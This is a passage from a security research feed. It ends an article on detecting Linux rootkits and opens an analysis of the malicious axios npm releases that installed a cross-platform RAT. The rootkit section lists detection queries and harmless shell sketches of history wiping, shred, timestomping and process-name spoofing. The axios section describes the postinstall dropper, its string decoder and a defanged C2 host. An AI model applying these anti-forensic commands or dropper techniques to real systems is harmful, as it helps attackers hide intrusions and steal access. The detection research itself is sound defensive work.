<p>Cloning repositories into <code>/tmp</code> and <code>/var/tmp</code> is common, so those paths can be removed from this rule in environments where such activity is routine. The same activity in <code>/dev/shm</code>, however, is very uncommon.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image10.png" alt="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm" title="Figure 12: Telemetry example of a GitHub repository cloning event in /dev/shm." /></p>
<p>The <code>setup.sh</code> script, called by the loader, continues by compiling the LKM in a <code>/dev/shm/</code> subdirectory. Real threat actors generally avoid compiling on the host itself; nevertheless, it is not uncommon to see this happen in the wild.</p>
<pre><code class="language-sql">sequence with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
   process.name like (
     &quot;*gcc*&quot;, &quot;*g++*&quot;, &quot;c++&quot;, &quot;cc&quot;, &quot;c99&quot;, &quot;c89&quot;, &quot;cc1*&quot;, &quot;clang*&quot;,
     &quot;musl-clang&quot;, &quot;tcc&quot;, &quot;zig&quot;, &quot;ccache&quot;, &quot;distcc&quot;
   )] as event0
  [file where event.action == &quot;creation&quot; and file.path like &quot;/dev/shm/*&quot; and
   process.name like (
     &quot;ld&quot;, &quot;ld.*&quot;, &quot;lld&quot;, &quot;ld.lld&quot;, &quot;mold&quot;, &quot;collect2&quot;, &quot;*-linux-gnu-ld*&quot;, 
     &quot;*-pc-linux-gnu-ld*&quot;
   ) and
   stringcontains~(event0.process.command_line, file.name)]
</code></pre>
<p>This endpoint logic detects the execution of a compiler, followed by the linker creating a file in <code>/dev/shm</code> (or a subdirectory).</p>
<p>Finally, since the whole repository was cloned into <code>/dev/shm</code> and <code>setup.sh</code> and <code>x.sh</code> were executed, we will observe process execution from the shared-memory directory, which is uncommon in most environments:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.executable like (&quot;/dev/shm/*&quot;, &quot;/run/shm/*&quot;)
</code></pre>
<p>These rules are available within the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml">Git Repository or File Download to Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/331b0c762ef5293cea812a9b676e84527fbe5f73/behavior/rules/linux/defense_evasion_linux_compilation_in_suspicious_directory.toml">Linux Compilation in Suspicious Directory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_binary_executed_from_shared_memory_directory.toml">Binary Executed from Shared Memory Directory</a></li>
</ul>
<h4>Masquerading as legitimate processes</h4>
<p>To avoid scrutiny during process enumeration or system monitoring, rootkits often rename their processes and threads to match benign system components. Common disguises include:</p>
<ul>
<li><code>kworker</code>, <code>migration</code>, or <code>rcu_sched</code> (kernel threads)</li>
<li><code>sshd</code>, <code>systemd</code>, <code>dbus-daemon</code>, or <code>bash</code> (userland daemons)</li>
</ul>
<p>These names are chosen to blend in with the output of tools like <code>ps</code>, <code>top</code>, or <code>htop</code>, making manual detection more difficult. Examples of rootkits that leverage this technique include Reptile and <a href="https://www.elastic.co/security-labs/declawing-pumakit">PUMAKIT</a>. Reptile generates unusual network events through <code>kworker</code> upon initialization:</p>
<pre><code class="language-sql">network where event.type == &quot;start&quot; and event.action == &quot;connection_attempted&quot; 
and process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and not (
  destination.ip == null or
  destination.ip == &quot;0.0.0.0&quot; or
  cidrmatch(
    destination.ip,
    &quot;10.0.0.0/8&quot;, &quot;127.0.0.0/8&quot;, &quot;169.254.0.0/16&quot;, &quot;172.16.0.0/12&quot;,
    &quot;192.0.0.0/24&quot;, &quot;192.0.0.0/29&quot;, &quot;192.0.0.8/32&quot;, &quot;192.0.0.9/32&quot;,
    &quot;192.0.0.10/32&quot;, &quot;192.0.0.170/32&quot;, &quot;192.0.0.171/32&quot;, &quot;192.0.2.0/24&quot;, 
    &quot;192.31.196.0/24&quot;, &quot;192.52.193.0/24&quot;, &quot;192.168.0.0/16&quot;, &quot;192.88.99.0/24&quot;,
    &quot;224.0.0.0/4&quot;, &quot;100.64.0.0/10&quot;, &quot;192.175.48.0/24&quot;,&quot;198.18.0.0/15&quot;, 
    &quot;198.51.100.0/24&quot;, &quot;203.0.113.0/24&quot;, &quot;240.0.0.0/4&quot;, &quot;::1&quot;,
    &quot;FE80::/10&quot;, &quot;FF00::/8&quot;
  )
)
</code></pre>
<p>The example below shows Reptile’s port knocking functionality, where the kernel thread forks, changes its session ID to 0, and sets up the network connection:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image5.png" alt="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread" title="Figure 13: Telemetry example of Reptile’s port knocking via a kernel worker thread." /></p>
<p>Reptile is also seen to leverage the same <code>kworker</code> process to create files:</p>
<pre><code class="language-sql">file where event.type == &quot;creation&quot; and
process.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;)
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image4.png" alt="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread" title="Figure 14: Telemetry example of a /dev/ptmx file creation from Reptile’s kernel worker thread." /></p>
<p><a href="https://www.elastic.co/security-labs/declawing-pumakit">PUMAKIT</a> spawns kernel threads to execute userland commands through <code>kthreadd</code>, but similar activity has been observed through a <code>kworker</code> process in other rootkits:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.parent.name like~ (&quot;kworker*&quot;, &quot;kthreadd&quot;) and
process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and
process.args == &quot;-c&quot;
</code></pre>
<p>These <code>kworker</code> and <code>kthreadd</code> rules may generate false positives due to the Linux kernel's internal operations. These can easily be excluded on a per-environment basis, or additional command-line arguments can be added to the logic.</p>
<p>These rules are available in the detection-rules and protections-artifacts repositories:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/command_and_control_linux_kworker_netcon.toml">Network Activity Detected via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/persistence_kworker_file_creation.toml">Suspicious File Creation via Kworker</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/privilege_escalation_kworker_uid_elevation.toml">Suspicious Kworker UID Elevation</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_shell_command_execution_via_kworker.toml">Shell Command Execution via Kworker</a></li>
</ul>
<p>Additionally, malicious processes, such as an initial dropper or a persistence mechanism, may masquerade as kernel threads by abusing a shell built-in. With the <code>exec -a</code> command, any process can be spawned under a name of the attacker’s choosing. Kernel process masquerading can be detected through the following detection query:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
process.command_line like &quot;[*]&quot; and process.args_count == 1
</code></pre>
<p>This behavior is shown below, where several pieces of malware tried to masquerade as either a kernel worker or a web service process.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image8.png" alt="Figure 15: Telemetry example of several malwares masquerading as kernel processes" title="Figure 15: Telemetry example of several malwares masquerading as kernel processes." /></p>
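<p>The technique itself is a one-liner. In the harmless sketch below, <code>exec -a</code> gives the spawned process a kernel-thread-style <code>argv[0]</code>, which the child can observe via <code>$0</code>:</p>

```shell
# "exec -a" (a bash builtin option) replaces argv[0] of the spawned process.
# Here the child's $0, which reflects argv[0], reports the spoofed
# kernel-thread-style name.
spoofed="$(bash -c 'exec -a "[kworker/0:0]" sh -c "echo \$0"')"
echo "argv[0] seen by the child: $spoofed"
```

<p>A process spawned this way appears under the spoofed bracketed name in <code>ps</code> output, which is what the query above hunts for.</p>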
<p>This technique is also commonly abused by threat actors leveraging The Hacker’s Choice (THC) toolkit, specifically upon deploying <a href="https://github.com/hackerschoice/gsocket">gsocket</a>.</p>
<p>Rules related to kernel masquerading, and masquerading via <code>exec -a</code> generally, are available in the protections-artifacts repository:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_process_masquerading_as_kernel_process.toml">Process Masquerading as Kernel Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_potential_process_masquerading_via_exec.toml">Potential Process Masquerading via Exec</a></li>
</ul>
<p>Another technique seen in the wild, and also in <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux-Rootkit.pdf">Horse Pill</a>, is the use of <code>prctl</code> to stomp its process name. To ensure this telemetry is available, a custom Auditd rule can be created:</p>
<pre><code class="language-shell">-a exit,always -F arch=b64 -S prctl -k prctl_detection
</code></pre>
<p>This can be paired with the following detection logic:</p>
<pre><code class="language-sql">process where host.os.type == &quot;linux&quot; and auditd.data.syscall == &quot;prctl&quot; and
auditd.data.a0 == &quot;f&quot;
</code></pre>
<p>Together, the audit rule and this query allow for the detection of this technique. In the screenshot below, we can see telemetry examples of this technique being used, where the <code>process.executable</code> is gibberish, and <code>prctl</code> is then used to masquerade on the system as a legitimate process.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image14.png" alt="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names" title="Figure 16: Telemetry example of several malwares leveraging prctl to stomp their process names." /></p>
<p>This rule, including its setup instructions, is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_prctl_process_name_tampering.toml">Potential Process Name Stomping with Prctl</a></li>
</ul>
<p>Although there are many ways to masquerade, these are the most common ones observed.</p>
<h4>Log and audit cleansing</h4>
<p>Many rootkits include routines that erase traces of their installation or activity from logs. One of these techniques is to clear the victim’s shell history. This can be detected in two ways. One method is to detect the deletion of the shell history file:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.name in (
  &quot;.bash_history&quot;, &quot;.zsh_history&quot;, &quot;.sh_history&quot;, &quot;.ksh_history&quot;,
  &quot;.history&quot;, &quot;.csh_history&quot;, &quot;.tcsh_history&quot;, &quot;fish_history&quot;
)
</code></pre>
<p>The second method is to detect process executions with command line arguments related to clearing the shell history:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (
    process.args in (&quot;rm&quot;, &quot;echo&quot;) or
    (
      process.args == &quot;ln&quot; and process.args == &quot;-sf&quot; and
      process.args == &quot;/dev/null&quot;
    ) or
    (process.args == &quot;truncate&quot; and process.args == &quot;-s0&quot;)
  )
  and process.command_line like~ (
    &quot;*.bash_history*&quot;, &quot;*.zsh_history*&quot;, &quot;*.sh_history*&quot;, &quot;*.ksh_history*&quot;,
    &quot;*.history*&quot;, &quot;*.csh_history*&quot;, &quot;*.tcsh_history*&quot;, &quot;*fish_history*&quot;
  )
) or
(process.name == &quot;history&quot; and process.args == &quot;-c&quot;) or
(
  process.args == &quot;export&quot; and
  process.args like~ (&quot;HISTFILE=/dev/null&quot;, &quot;HISTFILESIZE=0&quot;)
) or
(process.args == &quot;unset&quot; and process.args like~ &quot;HISTFILE&quot;) or
(process.args == &quot;set&quot; and process.args == &quot;history&quot; and process.args == &quot;+o&quot;)
</code></pre>
<p>Having both detection rules (process and file) active will enable a more robust defense-in-depth strategy.</p>
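<p>The history-clearing idioms that the process-based rule keys on can be reproduced harmlessly, as in the sketch below, which redirects everything to a throwaway <code>HOME</code>:</p>

```shell
# Run against a throwaway HOME so nothing real is touched.
export HOME="$(mktemp -d)"
touch "$HOME/.bash_history"

truncate -s0 "$HOME/.bash_history"      # empty the on-disk history file
ln -sf /dev/null "$HOME/.bash_history"  # future history writes vanish
export HISTFILE=/dev/null               # stop recording for this session
# An interactive attacker would also run: history -c
```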
<p>Upon loading, rootkits may taint the kernel or generate out-of-tree module warnings that can be identified when parsing syslog and kernel logs. To erase their tracks, rootkits may delete these log files:</p>
<pre><code class="language-sql">file where event.type == &quot;deletion&quot; and file.path in (
  &quot;/var/log/syslog&quot;, &quot;/var/log/messages&quot;, &quot;/var/log/secure&quot;, 
  &quot;/var/log/auth.log&quot;, &quot;/var/log/boot.log&quot;, &quot;/var/log/kern.log&quot;, 
  &quot;/var/log/dmesg&quot;
)
</code></pre>
<p>Or clear the kernel message buffer through <code>dmesg</code>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;dmesg&quot; and process.args in (&quot;-c&quot;, &quot;--clear&quot;)
</code></pre>
<p>An example of a rootkit that automatically clears the <a href="https://man7.org/linux/man-pages/man1/dmesg.1.html">dmesg</a> ring buffer is the <a href="https://github.com/bluedragonsecurity/bds_lkm">bds rootkit</a>, which loads by executing <code>/opt/bds_elf/bds_start.sh</code>:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image12.png" alt="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg" title="Figure 17: Telemetry example of bds’s kernel buffer ring clearing via dmesg." /></p>
<p>Another means of clearing these logs is by using <a href="https://man7.org/linux/man-pages/man1/journalctl.1.html">journalctl</a>:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;journalctl&quot; and
process.args like (&quot;--vacuum-time=*&quot;, &quot;--vacuum-size=*&quot;, &quot;--vacuum-files=*&quot;)
</code></pre>
<p>This is a technique that was used by Singularity:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image11.png" alt="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl" title="Figure 18: Telemetry example of Singularity attempting to clear logs via journalctl." /></p>
<p>Another technique employed by Singularity’s loader script is the deletion of all files associated with the rootkit, either when it fails to load or once the loading process completes. For more thorough deletion, the author chose <code>shred</code> over <code>rm</code>. <code>rm</code> simply unlinks the file, which is fast but leaves the data recoverable. <code>shred</code> overwrites the file contents multiple times with random data, ensuring they cannot be recovered. This makes the deletion more permanent but also noisier from a behavior-detection point of view, since <code>shred</code> is not commonly used on most Linux systems.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;shred&quot; and (
// Any short-flag cluster containing at least one of u/z, 
// and containing no extra &quot;-&quot; after the first one
process.args regex~ &quot;-[^-]*[uz][^-]*&quot; or
process.args in (&quot;--remove&quot;, &quot;--zero&quot;)
) and
not process.parent.name == &quot;logrotate&quot;
</code></pre>
<p>The regex above makes it harder to evade detection by combining or reordering flags. Below is an example of Singularity searching for any files related to its deployment and shredding them:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image13.png" alt="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence" title="Figure 19: Telemetry example of a rootkit’s loading process attempting to shred any evidence." /></p>
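<p>The shredding behavior itself is simple to reproduce; in this sketch, a throwaway file stands in for the rootkit’s deployment artifacts:</p>

```shell
# Create a throwaway file, then shred it: the default random-data passes are
# followed by -z (a final zero pass to hide the shredding), and -u unlinks
# the file afterwards.
echo "loader artifact" > ./demo_artifact
shred -uz ./demo_artifact
```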
<p>These file and log removal techniques can be detected via several out-of-the-box detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_log_files_deleted.toml">System Log File Deletion</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml">Attempt to Clear Kernel Ring Buffer</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_journalctl_clear_logs.toml">Attempt to Clear Logs via Journalctl</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/linux/defense_evasion_file_deletion_via_shred.toml">File Deletion via Shred</a></li>
</ul>
<p>Once a rootkit is finished clearing its traces, it may timestomp the files it altered to ensure no file modification trace is left behind:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.name == &quot;touch&quot; and
process.args like (
  &quot;-t*&quot;, &quot;-d*&quot;, &quot;-a*&quot;, &quot;-m*&quot;, &quot;-r*&quot;, &quot;--date=*&quot;, &quot;--reference=*&quot;, &quot;--time=*&quot;
)
</code></pre>
<p>An example of this is shown here, where a threat actor uses the <code>/etc/ld.so.conf</code> file’s timestamp as a reference time for the files in <code>/dev/shm</code> in an attempt to blend in:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image3.png" alt="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm" title="Figure 20: Telemetry example of a threat actor attempting to timestomp their payload in /dev/shm." /></p>
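<p>The reference-timestamp trick can be reproduced in two commands; the filenames below are stand-ins for the reference file and the payload:</p>

```shell
# Stand-in reference file with an old timestamp (the actor used /etc/ld.so.conf).
touch -d "2020-01-01 00:00:00" ./demo_reference
echo "payload" > ./demo_payload
# Copy the reference file's access and modification times onto the payload.
touch -r ./demo_reference ./demo_payload
```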
<p>This is a technique that we have added coverage for via both detection rules and protection artifacts:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/cf6472005a64805453f868248895884c43725b6f/rules/cross-platform/defense_evasion_timestomp_touch.toml">Timestomping using Touch Command</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/473c8536449c12f4e6bf1dc7de4fbded217592a5/behavior/rules/linux/defense_evasion_timestomping_detected_via_touch.toml">Timestomping Detected via Touch</a></li>
</ul>
<p>Although there are more techniques than we could cover here, we are confident that this research will help deepen the understanding of the Linux rootkit landscape and its detection engineering.</p>
<h2>Rootkit prevention techniques</h2>
<p>Preventing Linux rootkits requires a layered defense strategy that combines kernel and userland hardening, strict access control, and continuous monitoring. Mandatory access control frameworks, such as SELinux and AppArmor, limit process behavior and userland persistence opportunities. Meanwhile, kernel hardening techniques, including Lockdown Mode, KASLR, SMEP/SMAP, and tools like LKRG, mitigate the risk of kernel-level compromise. Restricting kernel module usage by disabling dynamic loading or enforcing module signing further reduces common vectors for rootkit deployment.</p>
<p>Visibility into malicious behavior is enhanced through Auditd and file integrity monitoring for syscall and file activity, as well as through EDR solutions that identify and prevent suspicious runtime behaviors. Security is further strengthened by minimizing process privileges through <code>seccomp-bpf</code>, Linux capabilities, and the Landlock LSM, thereby restricting syscall access and filesystem interactions.</p>
<p>Timely kernel and software updates, supported by live patching when necessary, close known vulnerabilities before they are exploited. Additionally, filesystem and device configurations should be hardened by remounting sensitive filesystems with restrictive flags and disabling access to kernel memory interfaces, such as <code>/dev/mem</code> and <code>/proc/kallsyms</code>.</p>
<p>No single control can prevent rootkits outright. A layered defense, combining configuration hardening, static and dynamic detection, and forensic readiness, remains essential.</p>
<h2>Conclusion</h2>
<p>In <a href="https://www.elastic.co/security-labs/linux-rootkits-1-hooked-on-linux">part one of this series</a>, we examined how Linux rootkits operate internally, exploring their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we translated that knowledge into practical detection strategies, focusing on the behavioral signals and runtime telemetry that expose rootkit activity.</p>
<p>While Windows malware continues to dominate the focus of commercial security vendors and threat research communities, Linux remains comparatively under-researched, despite powering the majority of the world’s cloud infrastructure, high-performance computing environments, and internet services.</p>
<p>Our analysis highlights that Linux rootkits are evolving. The increasing adoption of technologies such as eBPF, <code>io_uring</code>, and containerized Linux workloads introduces new attack surfaces that are not yet well understood or widely protected.</p>
<p>We encourage the security community to:</p>
<ul>
<li>Invest in Linux-focused detection engineering from both static and dynamic angles.</li>
<li>Share research findings, proofs of concept, and detection strategies openly to accelerate collective knowledge among defenders.</li>
<li>Collaborate across vendors, academia, and industry to push Linux rootkit defense toward the same maturity level achieved on Windows.</li>
</ul>
<p>Only by collectively improving visibility, detection, and response capabilities can defenders stay ahead of this stealthy and rapidly evolving threat landscape.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/linux-rootkits-2-caught-in-the-act.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Inside the Axios supply chain compromise - one RAT to rule them all]]></title>
            <link>https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all</link>
            <guid>axios-one-rat-to-rule-them-all</guid>
            <pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs analyzes a supply chain compromise of the axios npm package delivering a unified cross-platform RAT]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>Elastic Security Labs released <a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">initial triage and detection rules</a> for the Axios supply-chain compromise. This is a detailed analysis of the RAT and payloads.</p>
</blockquote>
<h2>Introduction</h2>
<p>Elastic Security Labs identified a supply chain compromise of the axios npm package, one of the most depended-upon packages in the JavaScript ecosystem with approximately 100 million weekly downloads. The attacker compromised a maintainer account and published backdoored versions that delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems through a malicious postinstall hook.</p>
<h3>Key takeaways</h3>
<ul>
<li>A compromised npm maintainer account (jasonsaayman) was used to publish two malicious versions of the widely used Axios HTTP client — 1.14.1 (tagged latest) and 0.30.4 (tagged legacy) — meaning a default npm install axios resolved to a backdoored package</li>
<li>The malicious JavaScript deploys platform-specific stage-2 implants for macOS, Windows, and Linux</li>
<li>All three stage-2 payloads are implementations of the <strong>same RAT</strong> — identical C2 protocol, command set, beacon cadence, and spoofed user-agent, written in PowerShell (Windows), C++ (macOS), and Python (Linux)</li>
<li>The dropper performs anti-forensic cleanup by deleting itself and swapping its package.json with a clean copy, erasing evidence of the postinstall trigger from <code>node_modules</code></li>
</ul>
<h2>Preamble</h2>
<p>On March 30, 2026, Elastic Security Labs detected a supply chain compromise targeting the <a href="https://www.npmjs.com/package/axios">axios</a> npm package through automated supply-chain monitoring. The attacker gained control of the npm account belonging to jasonsaayman, one of the project's primary maintainers, and published two backdoored versions within a 39-minute window.</p>
<p>The axios package is one of the most widely depended-upon HTTP client libraries in the JavaScript ecosystem. At the time of discovery, both the latest and legacy dist-tags pointed to compromised versions, ensuring that the majority of fresh installations pulled a backdoored release.</p>
<p>The malicious versions introduced a single new dependency: plain-crypto-js, a purpose-built package whose postinstall hook silently downloaded and executed platform-specific stage-2 RAT implants from sfrclak[.]com:8000.</p>
<p>What makes this campaign notable beyond its blast radius is the stage-2 tooling. The attacker deployed three parallel implementations of the <strong>same RAT</strong> — one each for Windows, macOS, and Linux — all sharing an identical C2 protocol, command structure, and beacon behavior. This isn't three different tools; it's a single cross-platform implant framework with platform-native implementations.</p>
<p>Elastic Security Labs filed a GitHub Security Advisory to the axios repository on <strong>March 31, 2026 at 01:50 AM UTC</strong> to coordinate disclosure and ensure the maintainers and npm registry could act on the compromised versions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image3.png" alt="GitHub Security Advisory filed to the axios repository" title="GitHub Security Advisory filed to the axios repository" /></p>
<p>As the community flagged the compromise on social media, Elastic Security Labs shared early findings publicly to help defenders respond in real time.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/axios-one-rat-to-rule-them-all/image2.png" alt="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" title="Early coordination on X as Elastic Security Labs began sharing indicators and analysis during the active compromise" /></p>
<p>This post covers the full attack chain: from the npm-level supply chain compromise through the obfuscated dropper, to the architecture of the cross-platform RAT and the meaningful differences between its three variants.</p>
<h2>Campaign overview</h2>
<p>The compromise is evident from the npm registry metadata. The maintainer email changed from <code>jasonsaayman@gmail[.]com</code> — present on all prior legitimate releases — to <code>ifstap@proton[.]me</code> on the malicious versions. The publishing method also changed:</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>Published By</th>
<th>Method</th>
<th>Provenance</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>axios@1.14.0</code> (legitimate)</td>
<td><code>jasonsaayman@gmail[.]com</code></td>
<td>GitHub Actions OIDC</td>
<td>SLSA provenance attestations</td>
</tr>
<tr>
<td><code>axios@1.14.1</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
<tr>
<td><code>axios@0.30.4</code> (compromised)</td>
<td><code>ifstap@proton[.]me</code></td>
<td>Direct CLI publish</td>
<td>None</td>
</tr>
</tbody>
</table>
<p>The shift from a trusted OIDC publisher flow with SLSA provenance to a direct CLI publish with a changed email is a clear indicator of unauthorized access.</p>
<h3>Timeline</h3>
<ul>
<li><strong>2026-02-18 17:19 UTC</strong> — <code>axios@0.30.3</code> published legitimately by <code>jasonsaayman@gmail[.]com</code></li>
<li><strong>2026-03-27 19:01 UTC</strong> — <code>axios@1.14.0</code> published legitimately via GitHub Actions OIDC</li>
<li><strong>2026-03-30 05:57 UTC</strong> — <code>plain-crypto-js@4.2.0</code> published by <code>nrwise</code> (<code>nrwise@proton.me</code>) — clean decoy to build registry history</li>
<li><strong>2026-03-30 23:59 UTC</strong> — <code>plain-crypto-js@4.2.1</code> published by <code>nrwise</code> — malicious version with <code>postinstall</code> backdoor</li>
<li><strong>2026-03-31 00:21 UTC</strong> — <code>axios@1.14.1</code> published by compromised account — tagged <code>latest</code></li>
<li><strong>2026-03-31 01:00 UTC</strong> — <code>axios@0.30.4</code> published by compromised account — tagged <code>legacy</code></li>
</ul>
<h3>Affected packages</h3>
<ul>
<li><strong><code>axios@1.14.1</code> — Malicious, tagged <code>latest</code> at time of discovery</strong></li>
<li><strong><code>axios@0.30.4</code> — Malicious, tagged <code>legacy</code> at time of discovery</strong></li>
<li><strong><code>plain-crypto-js@4.2.0</code> — Clean decoy, published to build registry history</strong></li>
<li><strong><code>plain-crypto-js@4.2.1</code> — Malicious, payload delivery vehicle (<code>postinstall</code> backdoor)</strong></li>
</ul>
<p><strong>Safe versions:</strong> <code>axios@1.14.0</code> (last legitimate 1.x release with SLSA provenance) and <code>axios@0.30.3</code> (last legitimate <code>0.30.x</code> release).</p>
<p>The attacker tagged both the latest and legacy channels, maximizing the blast radius across projects using either the current or legacy axios API.</p>
<h2>Code analysis</h2>
<h3>Stage 1: The plain-crypto-js dropper</h3>
<p>The entire delivery chain hinges on npm's postinstall lifecycle hook. Installing either compromised axios version pulls <code>plain-crypto-js@^4.2.1</code> as a dependency, which declares:</p>
<pre><code class="language-json">&quot;scripts&quot;: {
  &quot;postinstall&quot;: &quot;node setup.js&quot;
}
</code></pre>
<p>This causes <code>setup.js</code> to execute automatically during <code>npm install</code> — no user interaction required.</p>
<p>The <code>setup.js</code> file uses a two-layer encoding scheme to conceal its behavior:</p>
<ul>
<li><strong>Layer 1:</strong> String reversal followed by Base64 decoding</li>
<li><strong>Layer 2:</strong> XOR cipher using the key OrDeR_7077 with a position-dependent index (7 * i² % 10)</li>
</ul>
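<p>Taken at face value, the two layers invert cleanly. The following Python sketch is our reconstruction of the decoder (the actual dropper is JavaScript; function names are illustrative):</p>
<pre><code class="language-py">import base64

KEY = 'OrDeR_7077'  # XOR key recovered from the dropper

def decode_string(encoded):
    # Layer 1: undo the string reversal, then Base64-decode
    raw = base64.b64decode(encoded[::-1])
    # Layer 2: XOR each byte with the key at index (7 * i * i) % 10
    return ''.join(chr(b ^ ord(KEY[(7 * i * i) % 10])) for i, b in enumerate(raw))

def encode_string(plaintext):
    # Inverse operation, handy for validating the decoder against samples
    xored = bytes(ord(c) ^ ord(KEY[(7 * i * i) % 10]) for i, c in enumerate(plaintext))
    return base64.b64encode(xored).decode()[::-1]
</code></pre>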
<p>All critical strings (module names, URLs, and shell commands) are stored in an encoded array <code>stq[]</code> and decoded at runtime. The decoded contents reveal the operational infrastructure.</p>
<h3>Platform-specific delivery</h3>
<p>After decoding its string table, the dropper checks <code>os.platform()</code> and branches into one of three delivery routines. Each sends an HTTP POST to <code>http://sfrclak[.]com:8000/6202033</code> with a platform-specific body — <code>packages.npm.org/product0</code> (macOS), <code>packages.npm.org/product1</code> (Windows), <code>packages.npm.org/product2</code> (Linux) — allowing the C2 to serve the correct payload from a single endpoint. The <code>packages.npm.org/</code> prefix is a deliberate attempt to make outbound traffic appear as benign npm registry communication in network logs:</p>
<table>
<thead>
<tr>
<th>Platform</th>
<th>Delivery Method</th>
<th>Stage-2 Location</th>
<th>Disguise</th>
</tr>
</thead>
<tbody>
<tr>
<td>macOS</td>
<td>AppleScript via osascript downloads binary with curl</td>
<td><code>/Library/Caches/com.apple.act.mond</code></td>
<td>Apple system daemon</td>
</tr>
<tr>
<td>Windows</td>
<td>VBScript downloads .ps1 via curl, executes via renamed PowerShell (<code>%PROGRAMDATA%\wt.exe</code>)</td>
<td><code>%TEMP%\6202033.ps1</code> (transient)</td>
<td>Windows Terminal</td>
</tr>
<tr>
<td>Linux</td>
<td>Direct curl download and python3 execution</td>
<td><code>/tmp/ld.py</code></td>
